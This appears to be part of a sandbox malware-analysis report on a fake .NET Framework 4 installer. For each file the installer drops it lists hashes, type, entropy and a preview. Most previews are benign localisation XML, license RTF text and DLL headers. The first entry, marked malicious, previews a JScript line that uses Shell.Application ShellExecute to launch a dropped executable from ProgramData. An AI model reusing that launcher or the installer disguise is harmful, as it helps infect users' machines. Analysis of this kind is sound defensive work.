                                                                                                                                                                  SHA-512:2190BC7350E582581A552BFCEA2B5C25898EAAB34F342A81F342F3ED180773425D5BDC5E2281BBB76A67940645793295E24ECCAF7DEA2164AC54CAF417CDBD13
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:var nPiCCaK = new ActiveXObject("Shell.Application");..nPiCCaK.ShellExecute("C:\\ProgramData\\essam@sasa2023.exe", "", "", "Open", "1");
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (627), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):74214
                                                                                                                                                                  Entropy (8bit):4.180711029644354
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4w1hDxsSsxGMZzhKtQOsitz0SBijTJ3ejrwddv:PhDxsnxGMdAVBijTJ3eHm
                                                                                                                                                                  MD5:C5BF74C96A711B3F7004CA6BDDECC491
                                                                                                                                                                  SHA1:4C4D42FF69455F267CE98F1DB8F2C5D76A1046DA
                                                                                                                                                                  SHA-256:6B67C8A77C1A637B72736595AFDF77BDB3910AA9FE48D959775806A0683FFA66
                                                                                                                                                                  SHA-512:2F2071BF9966BFFE64C90263F4B9BD5EFCAC4F976C4E42FBDEAA5D6A6DEE51C33F4902CF5E3D0897E1C841E9182E25C86D42E392887BC3CE3D9ED3D780D96AC9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".. . J.*.9.0.1. .*.4.:.J.D. .'.D.%.9./.'./. .A.J. .H.6.9. .'.D.*.H.'.A.B... .D.E.2.J./. .E.F. .'.D.E.9.D.H.E.'.*... .1.'.,.9. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.'.D.E.D.A. .'.D.*.E.G.J./.J.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):17240
                                                                                                                                                                  Entropy (8bit):5.619267132242324
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:Ea4ZUfwxW1NX2QxqaSzWUrfncpNWLIeWkQKPnEtObMacxc8hjXHUz1TrOKA+nfW6:Nx2SX2vPzBrSNWkeWkLXci2jXHU46iQ
                                                                                                                                                                  MD5:35B62B395968B7754C298FBB410E9821
                                                                                                                                                                  SHA1:DE95297EE33466DDA2A63C8658E79F17EBBB2911
                                                                                                                                                                  SHA-256:4BC6711145430AC74F0D8F80A41DD89ACE79427EBAF7D3CFE479A43DB08D66E1
                                                                                                                                                                  SHA-512:CD34802098D57CA81446B32D2CD39B3B3FA659ED0A366167C09DAD5FF583B2266E28BA044486E343E4336A40E85D4A713E4E67EAC00B6CBFC3D4C33A1B9BD23B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
• Filename: dotNetFx40_Full_setup.exe, Detection: malicious
• Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious
• Filename: , Detection: malicious
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........(...............................................P............@.......................................... ...$...........,..X............................................................................................text...G...........................@..@.rsrc....0... ...&..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1256, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):7567
                                                                                                                                                                  Entropy (8bit):4.307679152385702
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sf3yLpQxL75CD7sH08JUXthIT2M+bOx7BnT7QUm2:AyLpQxL7YsH08JUXQT2M+s7BnT7QUm2
                                                                                                                                                                  MD5:AF1A4F6740A8B51683DFD89D520EB729
                                                                                                                                                                  SHA1:6B02C8E704D2D90DE9E0B63FA389B2899C75E567
                                                                                                                                                                  SHA-256:E4BA6C3852C94BB2034DFFED5A0FE45150E873B98ABA95A2C3A93A71227EF605
                                                                                                                                                                  SHA-512:C669728CA1AF1513DB36EAEE9F15AA7B0209E2F9E85C7FAE759794D05DEEF2920712C9C6F7AAF4ED1B13BF83D310DF6E770CD6C9A49D7FE62FD5F9A11464B255
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1256\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset178 Tahoma;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset178 Times New Roman;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\rtlpar\nowidctlpar\sb120\sa120\qr\lang1025\b\f0\rtlch\fs20\'c7\'e1\'d4\'d1\'e6\'d8 \'c7\'e1\'c5\'d6\'c7\'dd\'ed\'c9 \'e1\'ca\'d1\'ce\'ed\'d5 \'c8\'d1\'e4\'c7\'e3\'cc \lang1033\f1\ltrch MICROSOFT\par..\pard\brdrb\brdrs\brdrw10\brsp20 \rtlpar\nowidctlpar\sb120\sa120\qr MICROSOFT .NET FRAMEWORK 4\lang1025\f0\rtlch \'e1\'e4\'d9\'c7\'e3 \'c7\'e1\'ca\'d4\'db\'ed\'e1 \lang1033\f1\ltrch WINDOWS\lang1025\f0\rtlch \'e3\'e4 \lang1033\f1\ltrch MICROSOFT\par..MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE\lang1025\f0\rtlch \'e1\'e4\'d9\'c7\'e3 \'c7\'e1\'ca\'d4\'db\'ed\'e1 \lang1033\f1\ltrch WINDOWS\lang1025\f0\rtlch \'e3\'e4 \lang1033\f1\ltrch MICROSOFT\f2\par..\lang3073\f
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (457), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60816
                                                                                                                                                                  Entropy (8bit):4.3418522371704045
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiv:tbCWYFrewYTJCf
                                                                                                                                                                  MD5:967A6D769D849C5ED66D6F46B0B9C5A4
                                                                                                                                                                  SHA1:C0FF5F094928B2FA8B61E97639C42782E95CC74F
                                                                                                                                                                  SHA-256:0BC010947BFF6EC1CE9899623CCFDFFD702EEE6D2976F28D9E06CC98A79CF542
                                                                                                                                                                  SHA-512:219B13F1BEEB7D690AF9D9C7D98904494C878FBE9904F8CB7501B9BB4F48762F9D07C3440EFA0546600FF62636AC34CB4B32E270CF90CB47A9E08F9CB473030C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..[..z._!q.l(W.v.['`!j._.N.WL..0.Y..s.0}.......S..&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;....b.jHh&.l.t.;./.A.&.g.t.;..0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..d..[. .M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..S...g.\..g.N.a(u.z._\PbkK.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):14168
                                                                                                                                                                  Entropy (8bit):5.9724110685335825
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
                                                                                                                                                                  MD5:7C136B92983CEC25F85336056E45F3E8
                                                                                                                                                                  SHA1:0BB527E7004601E920E2AAC467518126E5352618
                                                                                                                                                                  SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
                                                                                                                                                                  SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
• Filename: dotNetFx40_Full_setup.exe, Detection: malicious
• Filename: Scotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exe, Detection: malicious
• Filename: , Detection: malicious
• Filename: , Detection: malicious
• Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious
• Filename: , Detection: malicious
• Filename: TinyTakeSetup_v_5_2_16.exe, Detection: malicious
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................@......E.....@.......................................... ..X............ ..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 950, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6309
                                                                                                                                                                  Entropy (8bit):4.470827969332999
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/R8NRf8TTVKTu4LuTu4LrzZD41raZM4HbegdxqKZJQ1/FSMZJujgzc/MpD1JzIf2:/R4Rfm2NBZMjOfro2n6CA2
                                                                                                                                                                  MD5:6F2F198B6D2F11C0CBCE4541900BF75C
                                                                                                                                                                  SHA1:75EC16813D55AAF41D4D6E3C8D4948E548996D96
                                                                                                                                                                  SHA-256:D7D3CFBE65FE62DFA343827811A8071EC54F68D72695C82BEC9D9037D4B4D27A
                                                                                                                                                                  SHA-512:B1F5B812182C7A8BF1C1A8D0F616B44B0896F2AC455AFEE56C44522B458A8638F5C18200A8FB23B56DC1471E5AB7C66BE1BE9B794E12EC06F44BEEA4D9D03D6F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg950\deff0\deflang1033\deflangfe1028{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset136 \'b7\'73\'b2\'d3\'a9\'fa\'c5\'e9;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars (<?[`\'7b\'a2\'47\'a2\'44?\'a1\'a5\'a1\'a7}{\*\fchars !'),.:\'3b>?]|\'7d\'a2\'46\'a1\'50?\'a1\'56\'a1\'58\'a1\'a6\'a1\'a8\'a1\'45\'a1\'4b}}..\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs28 MICROSOFT \lang1028\f1\'b3\'6e\'c5\'e9\'bc\'57\'b8\'c9\'b1\'c2\'c5\'76\'b1\'f8\'b4\'da\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0\fs20 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\f2\par..\f0 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4 \lang1028\f1\'a5\'ce\'a4\'e1\'ba\'dd\'b3\'5d\'a9
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (660), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80970
                                                                                                                                                                  Entropy (8bit):3.7136351704498183
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4w9jRY/svLov/QvQovOLeyndT/jfB7eyNdT9eTiyn15byYOMbqav8qAMrZEXw/Fm:Wt/jPvoZJZ0z
                                                                                                                                                                  MD5:0B6ED582EB557573E959E37EBE2FCA6A
                                                                                                                                                                  SHA1:82C19C7EAFB28593F453341ECA225873FB011D4C
                                                                                                                                                                  SHA-256:8A0DA440261940ED89BAD7CD65BBC941CC56001D9AA94515E346D57B7B0838FC
                                                                                                                                                                  SHA-512:ABA3D19F408BD74F010EC49B31A2658E0884661D2EFDA7D999558C90A4589B500570CC80410BA1C323853CA960E7844845729FFF708E3A52EA25F597FAD90759
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.a...n... .p.r.o.g.r.a.m. .n.e.l.z.e. .s.p.u.s.t.i.t. .v. .r.e.~.i.m.u. .k.o.m.p.a.t.i.b.i.l.i.t.y... .D.a.l.a... .i.n.f.o.r.m.a.c.e. .n.a.l.e.z.n.e.t.e. .v. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.s.o.u.b.o.r.u. .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.308536555634371
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:sIr67PAteQx2PoipahxPh1KuMWp1eWCLXci2jpvsH:sv6CMi2jpvsH
                                                                                                                                                                  MD5:62876C2FE28B1B5C434B9FAD80ABE9F9
                                                                                                                                                                  SHA1:BE3D479204B8E36933E0EECC250C330E69A06D02
                                                                                                                                                                  SHA-256:36E316718C8BBBD7B511E9074FC0EECB9ACD0A9B572F593A5A569CC93276D932
                                                                                                                                                                  SHA-512:FFDD2D8DB4AE62EA07178677D8C8745CF54D7EDBE1683478A2C588D5B84EF9EA970E2B1C44E3B8F18B33D189655B0C42D5747392DB97176A38FAB4CBAB3E3F10
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......V.....@.......................................... ..d(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1250, default language ID 1029
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3726
                                                                                                                                                                  Entropy (8bit):5.271587861695615
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:4BfgejTQpTfD/g7OyGBB2nZsEAVxfw8EMpDRI/YFkvvApzdYPBGx2:sfN7OHn2nZsEmf+Oa/c2
                                                                                                                                                                  MD5:B02C48825414EDCA106C92182D32BC8A
                                                                                                                                                                  SHA1:CF00219D69E3CFF9777BABECE1EE9D8CDC776AC9
                                                                                                                                                                  SHA-256:C6147000FC34894C724C09CB69FFCE75DD1263B69D063F75466D70B67B3C80DD
                                                                                                                                                                  SHA-512:B8AFE051701189F60789D0340FD15E81491456284305B55C4582D0153A2C8CB25F1EDD05F40B50893C7CBB80EC57FF635D764DB5F56AA2E945CF29E9C550E9BA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1250\deff0\deflang1029\deflangfe1029{\fonttbl{\f0\fswiss\fprq2\fcharset238 Tahoma;}{\f1\froman\fprq2\fcharset238{\*\fname Times New Roman;}Times New Roman CE;}{\f2\fswiss\fprq2\fcharset238 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 DODATKOV\'c9 LICEN\'c8N\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\'c8NOSTI MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1029\f0 MICROSOFT .NET FRAMEWORK 4 PRO OPERA\'c8N\'cd SYST\'c9M MICROSOFT WINDOWS\lang1033\f1\par..\lang1029\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PRO OPERA\'c8N\'cd SYST\'c9M MICROSOFT WINDOWS\par..\pard\brdrb\brdrs\brdrw10\brsp20 A P\'d8IDRU\'8eEN\'c9 JAZYKOV\'c9 SADY\par..\pard\nowidctlpar\sb120\sa120\b0 Licenci k\~tomuto dodatku v\'e1m poskytuje spole\'e8nost Microsoft Corporation (nebo n\'eckter\'e1 z\~jej\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte).\lang1033\b
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (700), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):77748
                                                                                                                                                                  Entropy (8bit):3.5770566057374418
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wvo3sGYQTjtLCpCggWuUyl+JMcf/zmSmRLAgRQJmS+e/JAu1O2Xx+v:9o8GYQTjtLCYggWuUMe+e/J8
                                                                                                                                                                  MD5:69925E463A6FEDCE8C8E1B68404502FB
                                                                                                                                                                  SHA1:76341E490A432A636ED721F0C964FD9026773DD7
                                                                                                                                                                  SHA-256:5F370D2CCDD5FA316BCE095BF22670123C09DE175B7801D0A77CDB68174AC6B7
                                                                                                                                                                  SHA-512:5F61ABEC49E1F9CC44C26B83AA5B32C217EBEBA63ED90D25836F51F810C59F71EC7430DC5338EFBA9BE720F800204891E5AB9A5F5EC1FF51EF46C629482E5220
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.l.a.t.i.o.n.s.p.r.o.g.r.a.m.m.e.t. .k.a.n. .i.k.k.e. .k...r.e. .i. .k.o.m.p.a.t.i.b.i.l.i.t.e.t.s.t.i.l.s.t.a.n.d... .D.u. .k.a.n. .f.i.n.d.e. .f.l.e.r.e. .o.p.l.y.s.n.i.n.g.e.r. .i. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.V.i.g.t.i.g.t.-.f.i.l.e.n.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.237828095883879
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:cNX61hALPTIOWWptfeWuLXci2jXHUgyh1J:cQweMi2jXHUgU1J
                                                                                                                                                                  MD5:9F0CD8981979154CC2A6393DA42731C5
                                                                                                                                                                  SHA1:AFFAFE8CF152C25DF75CF3E6B67B7AA8A4A80056
                                                                                                                                                                  SHA-256:30C86AE90DE0EE7D2A637AB7EF7AE450690A55A5EA8C007169BAB57B10F0E013
                                                                                                                                                                  SHA-512:036253A9B4718EC38C7784ABA6AA124E4A334170AD13546126B0D746F003A4FC571165DBDA3BC3DD1911C343326CAE22C0A3C0A82A17D7F5943D2F2057E3C060
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......9a....@.......................................... ..$(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3314
                                                                                                                                                                  Entropy (8bit):5.229229499381171
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:MTBfIGPzxT1B9TwDXOC1uJzGTcDC5bhPqljShnEGiBe4YOMpDIbu0L9D+Ogp+Ogj:If/Jqn1uJzGTcDC5bhSljShnEGioDOOa
                                                                                                                                                                  MD5:B756C9B475E1E5955D8BF1544DF556F7
                                                                                                                                                                  SHA1:03ACD306196D5C0CDFBEB947CE3E018C08FD08CB
                                                                                                                                                                  SHA-256:204021CC428C70F76DE750C0B01404E3396EE8602C8F25F44635F6F2BDBF693A
                                                                                                                                                                  SHA-512:88E44178770025B960BF2329901B6BEC90115B62D9F44A43FD914AEF687C2FCE7E370D9BA8CAAF9BF930553EB99580C47F8E7FDC0C32FE9A921DD368BF8E4658
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1030\b\f0\fs28 TILL\'c6G TIL LICENSVILK\'c5R FOR MICROSOFT-SOFTWARE\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1030\f0\fs22 MICROSOFT .NET FRAMEWORK 4 TIL MICROSOFT WINDOWS-OPERATIVSYSTEM\lang1033\par..\lang1030 MICROSOFT .NET FRAMEWORK 4-KLIENTPROFIL TIL MICROSOFT WINDOWS-OPERATIVSYSTEM\par..OG TILKNYTTEDE SPROGPAKKER\lang1033\f1\fs20\par..\pard\nowidctlpar\sb120\sa120\lang1030\b0\f0 Microsoft Corporation (eller, afh\'e6ngigt af hvor De bor, et af dets associerede selskaber) licenserer dette till\'e6g til Dem.\lang1033\b \lang1030\b0 Hvis De har licens til at bruge Microsoft Windows-operativsystemsoftware (som dette till\'e6g g\'e6lder for) ("
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (682), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):82346
                                                                                                                                                                  Entropy (8bit):3.5798945100215325
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:guayUbZwf+2CzQHsjz1VbxzPGnz6solo8xKc6JT/1Sy:JayUtwf+2CzQHshPGnz6solo8xKc6JTd
                                                                                                                                                                  MD5:8505219C0A8D950FF07DC699D8208309
                                                                                                                                                                  SHA1:7A557356C57F1FA6D689EA4C411E727438AC46DF
                                                                                                                                                                  SHA-256:C48986CDB7FE3401234E0A6540EB394C1201846B5BEB1F12F83DC6E14674873A
                                                                                                                                                                  SHA-512:7BCDAD0CB4B478068434F4EBD554474B69562DC83DF9A423B54C1701CA3B43C3B92DE09EE195A86C0D244AA5EF96C77B1A08E73F1F2918C8AC7019F8DF27B419
                                                                                                                                                                  Malicious:false
